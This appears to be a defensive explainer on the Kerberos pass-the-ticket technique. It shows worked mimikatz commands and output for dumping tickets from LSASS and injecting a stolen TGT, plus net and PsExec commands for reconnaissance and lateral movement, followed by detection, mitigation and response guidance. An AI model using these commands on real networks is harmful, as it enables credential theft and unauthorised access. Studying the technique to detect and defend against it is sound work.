Pass-the-ticket is a credential theft technique that enables adversaries to use stolen Kerberos tickets to authenticate to resources (e.g. file shares and other computers) as a user without compromising that user’s password. This technique is often used by adversaries to move laterally through an organization’s network while hunting for opportunities to escalate privileges or fulfill their mission.
Both ticket-granting service (TGS) tickets and ticket-granting tickets (TGT) can be stolen and reused by adversaries. Without administrative privileges, an adversary can obtain the TGT (using “fake delegation”) and all TGS tickets for the current user. With administrative privileges, an adversary can dump the LSASS process and obtain all TGTs and TGS tickets cached on the system.
How Pass-the-Ticket Works
Hover to see each step
In Pass-the-Ticket, an attacker…
Step 1: An adversary uses a tool like
mimikatz to extract Kerberos tickets from the memory of the
######## # In order to capture TGTs, this invocation of mimikatz must be run from an # elevated shell. ######## PS> mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" ######## # mimikatz outputs all tickets to screen, and writes them individually to files # in the current directory. We have truncated the output to show a single session. ######### Authentication Id : 0 ; 31770591 (00000000:01e4c7df) Session : RemoteInteractive from 4 User Name : joed Domain : DOMAIN Logon Server : DC1 Logon Time : 03/07/2020 08:07:58 SID : S-1-5-21-3501040295-3816137123-30697657-1109 * Username : joed * Domain : DOMAIN.COM * Password : (null) Group 0 - Ticket Granting Service  Start/End/MaxRenew: 09/07/2020 07:45:44 ; 09/07/2020 17:45:44 ; 16/07/2020 07:45:44 Service Name (03) : host ; host.domain.com ; @ DOMAIN.COM Target Name (03) : host ; host.domain.com ; @ DOMAIN.COM Client Name (01) : joed ; @ DOMAIN.COM ( DOMAIN.COM ) Flags 40a10000 : name_canonicalize ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac 516bedd608a71be859f1c0fa450708d915cd7e3bd99df793057ac110debfa98e Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...] * Saved to file [0;1e4c7df]-email@example.com ! Group 1 - Client Ticket ? Group 2 - Ticket Granting Ticket  Start/End/MaxRenew: 09/07/2020 07:45:44 ; 09/07/2020 17:45:44 ; 16/07/2020 07:45:44 Service Name (02) : krbtgt ; DOMAIN.COM ; @ DOMAIN.COM Target Name (02) : krbtgt ; DOMAIN ; @ DOMAIN.COM Client Name (01) : joed ; @ DOMAIN.COM ( DOMAIN ) Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac 34911deb40f5b400cfd9d8234b36dfdf2064b27bfabccdd65f077ed90918d85d Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...] * Saved to file [0;1e4c7df]-2-0-40e10000-joed@krbtgt-DOMAIN.COM.kirbi ! PS>
Step 2: Next, the threat actor uses
mimikatz.exe kerberos::ptt (or a tool with similar capabilities) to inject the stolen TGT into their own session, causing their session to adopt the identity and privileges of the stolen TGT for subsequent authentications to resources.
PS> mimikatz.exe "kerberos::ptt C:\KerberosTickets\[0;1e4c7df]-2-0-40e10000-joed@krbtgt-DOMAIN.COM.kirbi" * File: 'C:\KerberosTickets\[0;1e4c7df]-2-0-40e10000-joed@krbtgt-DOMAIN.COM.kirbi': OK PS> # The following command can be used to verify that the right ticket was successfully injected PS> mimikatz.exe "kerberos::list"  - 0x00000012 - aes256_hmac Start/End/MaxRenew: 09/07/2020 07:45:44 ; 09/07/2020 17:45:44 ; 16/07/2020 07:45:44 Server Name : krbtgt/DOMAIN.COM @ DOMAIN.COM Client Name : joed @ DOMAIN.COM Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; PS>
Step 3: Once a stolen ticket is ready for reuse, the threat actor needs to determine where it can be used. A stolen TGS can only be used to access the resource it was issued for and an adversary can determine that information by inspecting the TGS itself. If, however, the attacker was able to steal a TGT, the attacker may need to conduct internal reconnaissance to determine what privileges the user has to resources furthering the attacker’s objectives.
This may be as straightforward as querying the user’s group memberships looking for obvious indicators. Many tools exist to enumerate Active Directory, but an adversary can “live off the land” and use built-in commands like
net to discover these details.
PS> net user joed /domain The request will be processed at a domain controller for domain domain.com. User name joed Full Name Joe Dibley Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 6/15/2020 3:42:00 PM Password expires Never Password changeable 6/16/2020 3:42:00 PM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 7/9/2020 6:26:56 PM Logon hours allowed All Local Group Memberships Global Group memberships *Workstation Administrators *VPNUser *FileServer1_PublicShare *Domain Users The command completed successfully. PS>
Step 4: Using the stolen ticket and the information about the user’s privileges gleaned from internal reconnaissance, the threat actor can use lateral movement techniques to attempt to access other resources and further their objectives.
PS> .\PsExec.exe \\workstation456 powershell.exe PsExec v2.2 - Execute processes remotely Copyright (C) 2001-2016 Mark Russinovich Sysinternals - www.sysinternals.com Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. Try the new cross-platform PowerShell https://aka.ms/pscore6 PS> hostname workstation456 PS>
Detect, Mitigate, and Respond
Endpoints and Active Directory are both sources of signals indicating active use of pass-the-ticket in an environment.
Detection on the endpoint is accomplished by:
- Detecting the hooking of
LSASS.exefor retrieving or injecting Kerberos tickets. Many Endpoint Detection and Response solutions are capable of this; or,
- Analyzing logged-on sessions for a username mismatch in the logged-on user and its Kerberos tickets. We’ve created a proof-of-concept for this detection, written in PowerShell.
Detection in Active Directory can be accomplished by collecting and correlating several Kerberos event types:
- Develop a ledger of when a ticket-granting ticket was issued to a user and on which endpoint. Auditing of A Kerberos Authentication Ticket (TGT) was requested (Event ID 4768) and A Kerberos Service Ticket was renewed (Event ID 4770) are required to obtain these data points.
- Compare each request for a ticket-granting service (TGS) against the ledger to determine that the requesting endpoint is the same as the endpoint the TGT was issued to. Auditing of A Kerberos Service Ticket was requested (Event ID 4769) and A Kerberos Service Ticket was renewed (Event ID 4770) are required to perform this analysis.
The volume of these events in all but the smallest environments is substantial, which makes manual analysis impractical. As a result, real-time, machine-driven detection is preferred. It is also not possible to detect the theft and use of a single service ticket (TGS) within Active Directory.
While pass-the-ticket cannot be entirely eliminated, the best mitigations focus on making tickets harder to steal and limiting what a threat actor can do with a stolen ticket:
- Enable Microsoft’s Windows Defender Credential Guard. Introduced in Windows 10 and Windows Server 2016, Credential Guard builds on top of virtualization to protect credential storage and only permit trusted processes to access them.
- Do not allow users to possess administrative privileges to a large number of endpoints. This greatly reduces the risk that an adversary can use a stolen ticket for lateral movement.
- Do not allow users to possess administrative privileges across security boundaries. This greatly reduces the risk that an adversary can use a stolen ticket to escalate their privileges.
Should the use of pass-the-ticket be detected, there are several actions one can take to immediately respond:
- Reset the compromised user’s password, and optionally disable the user to a) force instantaneous replication to all domain controllers, and b) prevent further use of the compromised ticket.
- Reset the password for all users who have logged on to an impacted machine.
- Quarantine the impacted machines for forensic investigation, as well as eradication and recovery activities.
- Activate the incident response process and alert the response team.